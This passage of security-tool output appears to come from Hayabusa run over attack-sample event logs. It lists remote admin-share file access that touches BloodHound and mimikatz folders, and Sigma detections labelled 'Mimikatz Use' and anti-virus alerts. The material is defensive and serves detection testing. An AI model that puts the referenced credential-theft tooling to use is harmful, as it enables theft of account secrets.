+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\HackingStuff  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\HackingStuff\logs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Desktop\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
